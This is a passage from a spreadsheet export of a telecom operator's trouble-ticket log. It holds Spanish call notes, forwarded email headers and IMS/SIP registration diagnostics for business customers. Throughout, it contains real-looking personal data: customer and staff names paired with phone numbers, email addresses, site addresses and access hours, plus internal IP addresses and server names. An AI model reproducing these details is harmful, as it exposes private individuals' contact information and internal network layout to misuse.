**</t>
  </si>
  <si>
    <t>REGISTRO CORRECTO
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50222312800";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-06-13 11:15:08-06:00
O&amp;M    #455749
%%/*1879546595 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50222312800";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50222312800@IMSHWI.CLARO.COM.GT
                      IMPU  =  TEL:+50222312800
                SCU NUMBER  =  123
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  1800
             RESIDUAL TIME  =  1471
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@CESCSCF1.IMSHWI.CLARO.COM.GT;LR;DPT=7CE4_7F411246;CA=FFFFFFFF&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50222312800@10.16.113.250:26883;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
         ACCESS NETWORK ID  =  1
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  YEASTAR S100-30.14.0.127
       ORIGINAL IP ADDRESS  =  10.174.210.214
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50222312800";
GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-06-13 11:15:08-06:00
O&amp;M    #955285
%%/*1879573521 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50222312800";%%
RETCODE = 18460  THE USER DOES NOT EXIST.
---    END
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50222312800";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-06-13 11:15:15-06:00
O&amp;M    #455750
%%/*1879546596 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50222312800";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50222312800@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50222312800
         SCU NUMBER  =  123
     REGISTER STATE  =  REGISTERED
      REGISTER TIME  =  1800
      RESIDUAL TIME  =  1463
        PATH HEADER  =  &lt;SIP:TERM@CEPCSCF1.IMSHWI.CLARO.COM.GT;LR;SSN;TYPE=V4;IP=10.16.113.250;PORT=26883;DPT=7CE2_86&gt;
    CONTACT ADDRESS  =  &lt;SIP:+50222312800@10.16.113.250:26883;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
 AUTHORIZATION TYPE  =  MD5
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  YEASTAR S100-30.14.0.127
USER PRIORITY LEVEL  =  4
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  NULL
(NUMBER OF RESULTS = 1)
---    END
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50222312800";
GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-06-13 11:15:15-06:00
O&amp;M    #955288
%%/*1879573522 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50222312800";%%
RETCODE = 18460  THE USER DOES NOT EXIST.
---    END</t>
  </si>
  <si>
    <t>F4599571</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 10:48
PARA: JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; CÉLULAS COTECPRO &lt;CELULAS@COTECPRO.NET&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; GTGABRIELA.ORANTES@CLARO.COM &lt;GTGABRIELA.ORANTES@CLARO.COM&gt;; GTJOSE.ESTRADA@CLARO.COM &lt;GTJOSE.ESTRADA@CLARO.COM&gt;; GTJOSEDAV.RAMIREZ@CLARO.COM &lt;GTJOSEDAV.RAMIREZ@CLARO.COM&gt;; OMAR ANTONIO CABRERA DE LA ROCA &lt;OMAR.CABRERA@CLARO.COM.GT&gt;; LAURA BERROCAL &lt;LAURA.BERROCAL@WALMART.COM&gt;; NATALIA.ARCE1@WALMART.COM &lt;NATALIA.ARCE1@WALMART.COM&gt;; SILVIA.UGALDE0@WALMART.COM &lt;SILVIA.UGALDE0@WALMART.COM&gt;; JUAN JOSE FLORES &lt;JUAN.FLORES@WALMART.COM&gt;; OSCAR HERNANDEZ &lt;OSCAR@COTECPRO.NET&gt;; MARCO VEGA &lt;MARCO@COTECPRO.NET&gt;; CAM-CR - CENTRO DE MONITOREO SEGURIDAD-CR &lt;CAMCENTR86@WAL-MART.COM&gt;; CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: APERTURA DE TICKETS DE ATENCIÓN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4599572</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALVARO PORTILLO 78554212 INDICA QUE ESTA REALIZANDO PRUEBAS, SOLICITA QUE SE LE CONTACTE A LAS 14:00 HORAS</t>
  </si>
  <si>
    <t>F4599576</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR.  WILIAM ALVAREZ 506 60488528 SE LE INFORMA DEL INCIDENTE, UFINET ESTA ENVIANDO PERSONAL TECNICO AL NODO, CONFIRMA DE ENTERADO ...</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WILIAM ALVAREZ 506 60488528 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001854133</t>
  </si>
  <si>
    <t>F4599588</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  WILMAR VILLATORO AL 59228890 INDICA QUE EL SERVICIO ESTA ESTABLE Y SE CONFIRMAN LOS  DATOS DE CRONOLOGIA ANTERIOR INDICA QUE ESTAN CORRECTOS || SE NOTIFICA A GESTOR **
-ID 2001898125
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMAR VILLATORO AL 59228890 INDICA QUE NO ESTA EN OFICINA QUE SE LE LLAME AL SEÑOR  HENRY COCON AL 59228719
ID 2001830711
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMAR VILLATORO AL 59228890 INDICA QUE NO ESTA EN OFICINA QUE SE LE LLAME AL SEÑOR  HENRY COCON AL 59228719
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY COCON AL 59228719 NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001833142
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMAR VILLATORO AL 59228890 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001861415
**</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE WILMAR, SE LE INDICA REVISAR EL CABLE DE RED WAN, QUE ESTE SE ENCUENTRE CONECTADO CORRECTAMENTE, MENCIANA QUE ESTARA REVISANDO Y QUE SE LE LLAME  A LAS 13:00 HORAS, YA QUE EN ESTE MOMENTO NO SE ENCUENTRA EN SITIO, SI NO OBSERVA INCONVENIENTES SE COORDINARA VISITA PARA CERTIFICAR EL MEDIO.  CONFIRMA LOS SIGUIENTES DATOS:
HORARIO DE ATENCION: 8:00 A 17:00 HORAS
CONTACTO EN SITIO: WILMAR VILLATORO  59228890
DIRECCION: INTERNET_KM 85 CARR A TAXISCO GUANAGAZAPA ESCUINTLA, ALDEA LA UNION
PERMISOS: IDENTIFICACION SOLAMENTE
NÚMERO: 59228890
FIN: HOY, 11:36
ID DE LLAMADA: 2001860588</t>
  </si>
  <si>
    <t>F4599598</t>
  </si>
  <si>
    <t>-* SE HABLA CON EDUARDO (CLIENTE) SE LE INFORMA SOBRE EL PROCESO DE REEMPLAZO DE CPE EN CURSO, ENTERADO INFORMA QUE ESTARA ATENTO A MAS AVANCES -*
-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO MOLINO AL 50198545 SE TRATA DE CONTACTA A GESTOR PERO NO SE OBTIENE RESPUESTA SE LE INDICA QUE SE LE DEVOLVERA LLAMADA **
-ID 2001841524
**</t>
  </si>
  <si>
    <t>SE PLATICA CON EL TEC.  ALBERTO TRUJILLO NOS INFORMA QUE EN UN LAPSO DE 10 MINUTOS SE ENCUENTRA EN EL PR
2001881313
COLA:
NOMBRE: A: 47190439
NÚMERO: 47190439
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 47190439
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.CORADO
FECHA Y HORA LOCALES: 13/06/2022 12:26:51</t>
  </si>
  <si>
    <t>F4599602</t>
  </si>
  <si>
    <t>SE INFORMA A CLIENTE DANIEL GONZALEZ 45260124 QUE EL E1 ESTÁ AFECTADO POR FALLA MASIVA, CLIENTE ENTERADO. ID: 2001835263</t>
  </si>
  <si>
    <t>F4599604</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARTHA CASTILLO AL 25913485 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001810212
**</t>
  </si>
  <si>
    <t>F4599607</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEJANDRO RUIZ  AL 88954251 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001900198
**</t>
  </si>
  <si>
    <t>F4599613</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JAZER 88287828 SOLIITA TIEMPO PROCEDE A REVISAR EQUIPOS Y CONEXIONES ....</t>
  </si>
  <si>
    <t>F4599616</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE UBER PAZ AL 89870782 SE BRINDA RETROALIMENTACION *
ID 2001843905
**</t>
  </si>
  <si>
    <t>F4599623</t>
  </si>
  <si>
    <t>-* SE TIENE RESPUESTA DE CLIENTE, CONFIRMA TODO OK, SE RESPONDE INDICANDO QUE SE PROCEDE CON CIERRE DE TICKET -*
-*ASUNTO: RE: SEGUIMIENTO TICKET SD1134530 || DHL CUSTOMS (COSTA RICA) S. A.
OK GRACIAS Y CONFIRMAR YA  TENEMOS ACTIVO EN SERVICIO EN LA OFICINA.
SALUDOS</t>
  </si>
  <si>
    <t>F4599627</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LEONARDO BOJ 55167582 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001984756</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE  LEONARDO BOJ 55167582
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>REGISTRO CORRECTO, LLAMADA EN CURSO DESDE AEHTRA
DIR_DEPTAL_EDUC_XELA_90001906887\VOIP\TRUNK\SIP-EDUC15AV&gt;&gt;SHOW STATUS -S
STATUS OF SIP-EDUC15AV
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.231
CURRENT PROXY HOST       : 10.16.246.231
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : ETH1 UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 2484 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
CONNECTIONS:
USERTERM              DIR  REMOTEUSER           CODEC
ISDN-PRI-LINE-1(B1)   FROM 77611270             G.711-ALAW
COMMAND EXECUTED
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50279621250";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-06-13 09:39:13-06:00
O&amp;M    #455347
%%/*1879546583 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50279621250";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50279621250@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50279621250
         SCU NUMBER  =  115
     REGISTER STATE  =  REGISTERED
      REGISTER TIME  =  3600
      RESIDUAL TIME  =  3541
        PATH HEADER  =  &lt;SIP:TERM@CEPCSCF1.IMSHWI.CLARO.COM.GT;LR;SSN;TYPE=V4;IP=10.16.113.250;PORT=26393;DPT=7C62_86&gt;
    CONTACT ADDRESS  =  &lt;SIP:+50279621250@10.16.113.250:26393;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
 AUTHORIZATION TYPE  =  MD5
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  AETHRA TELECOMMUNICATIONS PBX
USER PRIORITY LEVEL  =  4
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  NULL
(NUMBER OF RESULTS = 1)
---    END
EXP USRINF:ENTITYPE=SCSCF,IMPU="TEL:+50279621250";
GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-06-13 09:39:13-06:00
O&amp;M    #954871
%%/*1879573502 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50279621250";%%
RETCODE = 18460  THE USER DOES NOT EXIST.
---    END
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50279621250";
GNCYGTAJ_CENTRO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-06-13 09:39:18-06:00
O&amp;M    #455348
%%/*1879546584 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50279621250";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50279621250@IMSHWI.CLARO.COM.GT
                      IMPU  =  TEL:+50279621250
                SCU NUMBER  =  115
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  3600
             RESIDUAL TIME  =  3536
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@CESCSCF1.IMSHWI.CLARO.COM.GT;LR;DPT=7C64_24EAF246;CA=FFFFFFFF&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50279621250@10.16.113.250:26393;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
         ACCESS NETWORK ID  =  1
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  AETHRA TELECOMMUNICATIONS PBX
       ORIGINAL IP ADDRESS  =  10.105.129.211
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END
EXP USRINF:ENTITYPE=PCSCF,IMPU="TEL:+50279621250";
GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF
+++    CSCF/*MEID:5 MENAME:GNCYGTGV_GUARDA_VIEJO_ABAJO_CSCF*/        2022-06-13 09:39:18-06:00
O&amp;M    #954872
%%/*1879573503 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50279621250";%%
RETCODE = 18460  THE USER DOES NOT EXIST.
---    END</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC LUDWIN PARA VALIDAR SI YA ESTA EN SITIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LEONARDO BOJ 55167582 MENCIONA QUE YA TODO ESTA FUNCIONANDO BIEN
CLIENTE MENCIONA QUE DESEA CAMBIAR EL EQUIPO AETRA SE LE INDICA QUE EL SEGUIMIENTO ES CON SU EJECUTIVA
---  LBOJ@MINEDUC.GOB.GT  ---
-ID 2001822330</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  LEONARDO BOJ  AL 55167582 CLIENTE NO RESPONDE || SE INTENTARA LUEGO **
-ID 2001901542
**</t>
  </si>
  <si>
    <t>CLIENTE NO CONTESTA DESPUES DE VARIOS INTENTOS, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEONARDO BOJ 55167582 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001978537</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LEONARDO BOJ 55167582 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001974159 - 2001974434</t>
  </si>
  <si>
    <t>F4599645</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 12:02
PARA: DAVID NOEL BARAHONA ESCOTO &lt;DAVID.BARAHONA@INVILP.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; ARCENIO NOE GARCIA CHAVEZ &lt;ARCENIO.GARCIA@CLARO.COM.HN&gt;; REDES Y COMUNICACIONES &lt;REDESYCOMUNICACIONES@INVILP.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; SERGIO AYALA FIGUEROA &lt;SERGIO.AYALA@CLARO.COM.HN&gt;
ASUNTO: RE: CLARO-PPL-JS-CASCADAS-TGU-ID-1641537
BUENA TARDE
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE, QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>F4599651</t>
  </si>
  <si>
    <t>REPORTA CAIDA TOTA
SOLUCION SIN INTERVENCION POR PARTE DE CLE CLARO. SERVICIO ACTIVO AL MOMENTO DE DIAGNOSTICO, POSIBLE EQUIPO INHIBIDO--</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE RICARDO VALENTÍN FUENTES 58599946 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001825710</t>
  </si>
  <si>
    <t>F4599657</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RICARDO VALENTÍN FUENTES 58599946 MENCIONA QUE EN PR SEGUIDO TIENEN PROBLEMA DE ENERGIA PERO INDICA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001838718</t>
  </si>
  <si>
    <t>F4599658</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAMON AGUILAR AL 72214763 INDICA QUE AUN NO CUENTA CON SERVICIO QUE SI ESTAN LOS EQUIPOS CONECTADOS || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CL **
-ID 2001848661
**</t>
  </si>
  <si>
    <t>F4599659</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO SERGIO ESCOBAR, NO RESPONDE
2001829983
COLA:
NOMBRE: A: 54662847
NÚMERO: 54662847
DURACIÓN: 0:00:14
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:SUSCRIPTOR AUSENTE (CÓDIGO DE CAUSA ISDN 20)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 54662847
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 13/06/2022 10:08:17
2001830113
COLA:
NOMBRE: A: 54662847
NÚMERO: 54662847
DURACIÓN: 0:00:09
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:SUSCRIPTOR AUSENTE (CÓDIGO DE CAUSA ISDN 20)/480:SIP - NO DISPONIBLE TEMPORALMENTE]
DETALLES: 54662847
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 13/06/2022 10:08:32</t>
  </si>
  <si>
    <t>F4599660</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIC LETICIA KESTLER AL 54669166 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 2001828728
**</t>
  </si>
  <si>
    <t>F4599662</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JACKIELINE BARRIOS AL 30090146 NO RESPONDE SE LLAMA A JENY ESCOBAR AL 42121779 INDICA QUE HOY NO ESTAN LABORANDO QUE NO PODRIA CONFIRMAR**
-ID 2001824907 - 2001825011
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ISRAEL GONZALEZ AL 52988845 SOLICITA QUE SE DEJE EN OBSERVACION PARA MEDIO DIA Y QUE SE LE LLAME PARA CONFIRMAR **
-ID 2001825948
**</t>
  </si>
  <si>
    <t>F4599677</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALVARO GARCIA AL 50900808 INDICA QUE AUN ESTA SIN INTERNET  || Y QUE YA REINICIO EQUIPOS PERO NO LEVANTA | SE NOTIFICA A GESTOR **
-ID 2001852429
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO GARCIA 50900808  MENCIONA QUE PERSISTE EL INCONVENIENTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001865176</t>
  </si>
  <si>
    <t>F4599684</t>
  </si>
  <si>
    <t>SE LLAMA A JOSUE HERRERA 0050670136426 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001165245</t>
  </si>
  <si>
    <t>###SE ENVIA VIA SKYPE A JOSUE HERRERA LA SOLICITUD PARA ACCESOS AL SITIO##
FALLA:::: F4599684
NOMBRE DEL CLIENTE:::: GMG SERVICIOS EL SALVADOR S.A.DE C.V.
UBICACIÓN:::: APOPA BO. SAN SEBASTIAN AVENIDA QUIRINO CHAVEZ 23  ENTRE 3RA Y 4TA CALLE ORIENTE
TECNICOS ASIGNADOS:
00128596-2	2987		DANIEL MARTINES
02884962-2	4551		  RENE RAMON ALVARENGA
PROBLEMA QUE REPORTA:::: ENLACE INESTABLE
DIAGNÓSTICO DEL PROBLEMA:::: PERDIDAS DE PAQUETES HACIA EL CPE CISCO, NO SE LOGRO VALIDAR PARAMETROS DE FO YA QUE ETX-1 NO RESPONDEN A PING NI TIENEN GESTION.
ACCIONES A TOMAR:::: CERTIFICAR LA FO, REVISION DE EQUIPO Y CONEXIONES EN NODO Y SITIO REMOTO (QUE ESTEN PROTEGIDOS CON UPS), REVISAR SI ES NECESARIO CAMBIO DE ETX-1 Y ROUTER CISCO, DEJAR TODA LA RUTA A 1G AL INGRESAR A LOS ETX-1, GRACIAS.</t>
  </si>
  <si>
    <t>SR. JOSUE HERRERA +506 70136426 INFORMA QUE OBSERVA PERDIDAS HACIA ESTE ENLACE, SE OBSERVA QUE EFECTIVAMENTE HAY PERDIDAS HACIA EN ENLACE...
SUCCESS RATE IS 99 PERCENT (7990/8000), ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JOSUE HERRERA +506 70136426 ACTUALMENTE EN LLAMADA....</t>
  </si>
  <si>
    <t>SR. JOSUE HERRERA +506 70136426 SOLICITA LA VISITA TECNICA PARA CERTIFICAR LOS EQUIPOS Y CONEXIONES, SE OBSERVA QUE LOS EQUIPOS ETX-1 NO TIENEN GESTION SE SOLICITA APOYO A CAMPO PARA CERTIFICAR LA FO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSUE HERRERA AL 506 70136426 INDICA QUE ESTA EN  LINEA CON OTRO COMPAÑERO ESPERANDO QUE LE COMUNIQUEN A GESTOR Y CORTA LLAMADA || SE NOTIFICA A AGESTOR **
-ID 2001839488
**</t>
  </si>
  <si>
    <t>F4599686</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 41063909  CLAUDIA RAMIREZ INDICA QUE YA LE CERTIFICARON SU SERVICIO Y QUE ESTA BIEN, AUTORIZA CIERRE DE TICKET
2001932631
COLA:
NOMBRE: A: 41063909
NÚMERO: 41063909
DURACIÓN: 0:01:03
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 41063909
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 13/06/2022 15:02:42</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ROSIO RAMIREZ AL 41063909  INDICA QUE TIENE PROBLEMA CON EL ANCHO DE BANDA YA QUE ELLA PAGA 180 Y HACIENDO PRUEBAS SOLO LE LLEGAN 90 SOLICITA QUE SE LE VISITE Y BRINDA LOS SIGUIENTES DATOS **
HORARIO DE ATENCION: 13:00 A 16:30 PM
GESTION DE PERMISOS: SOLO IDENTIFICADOS.
DIRECCION: 6 AV. FINA 8-142 Z.1 COATEPEQUE
ATENDERA EN SITIO: ROSIO RAMIREZ
-ID 2001857446
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ROSIO RAMIREZ 41063909 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA A LAS 11:00 HRS
-ID 2001834655</t>
  </si>
  <si>
    <t>F4599697</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JIMMY ANBEDAÑO  88995384 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001933349</t>
  </si>
  <si>
    <t>F4599698</t>
  </si>
  <si>
    <t>F4599715</t>
  </si>
  <si>
    <t>SE HABLÓ CON FRANCISCO GONZÁLEZ/CLIENTE 23742016 INDICA QUE AÚN PERSISTE LO REPORTADO, SE LE PIDE QUE NOS COMPARTA SUS PRUEBAS, INDICA QUE ASÍ LO HARÁ.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERTO RAMIREZ 47592164 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001855330</t>
  </si>
  <si>
    <t>F4599726</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON DANIEL MONTAÑEZ/CLIENTE 00 52 81 17196272 Y SE LE BRINDAN AVANCES DE LA FALLA QUE SE DESCRIBE EN CRONO ANTERIOR, AVANCES EN DOS HORAS.</t>
  </si>
  <si>
    <t>F4599730</t>
  </si>
  <si>
    <t>CLIENTE MIGUEL MACHÓN 77406207 UBICA ASMI52 ALARMADO, PROCEDE A REINICIARLO PERO INCONVENIENTE PERSISTE, SE TIENE POSIBLE LINEA ABIERTA. LLAMADA DESDE VIVO
ASMI52
PWR     VERDE
ALM     ROJO
SYNC1 ROJO</t>
  </si>
  <si>
    <t>F4599734</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY ANCHETA 70054183 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001871566</t>
  </si>
  <si>
    <t>F4599738</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO RUBIO 25562049 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE, POSIBLE FALLA DE ENERGIA
-ID 3001106809</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ERNESTO RUBIO 25562049 SOLICITA QUE SE ENVIE CORREO ASI ENVIARA A PERSONAL A REVISAR LOS EQUIPOS Y CONEXIONES EN SITIO DEL ATM.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE RESPUESTA CON VALIDACIONES DE PRIMER NIVEL
RE: SOLICITUD DE REVISIÓN ENLACE IPG003905 || BANCO DAVIVIENDA SALVADOREÑO S.A.</t>
  </si>
  <si>
    <t>F4599743</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ERNESTO RUBIO 25562049 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001152371</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 13 DE JUNIO DE 2022 12:20
